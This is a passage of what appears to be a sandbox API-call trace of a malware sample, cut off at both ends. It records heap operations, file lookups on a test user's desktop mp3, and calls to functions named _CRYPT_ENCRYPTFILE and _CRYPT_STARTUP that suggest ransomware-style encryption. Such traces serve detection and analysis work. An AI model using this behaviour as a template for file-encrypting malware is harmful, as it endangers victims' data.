| out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.988] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.988] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.988] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.988] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.988] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.988] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.988] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.988] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.988] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.989] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0075.989] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.989] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x59fa3130, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 0x6b89b8 [0075.989] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.989] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x59fa3130, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 0x6b89b8 [0075.990] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.990] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EgOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gOrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OrexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rexJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xJkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JkDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kDL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DL7op.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.992] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.992] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.992] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.992] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.992] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.992] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.992] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.992] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.992] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.992] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x59fa3130, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 0x6b89f8 [0075.993] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.993] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.993] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.993] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.993] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.993] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.993] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.993] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.993] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.994] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.994] CharUpperBuffW (in: 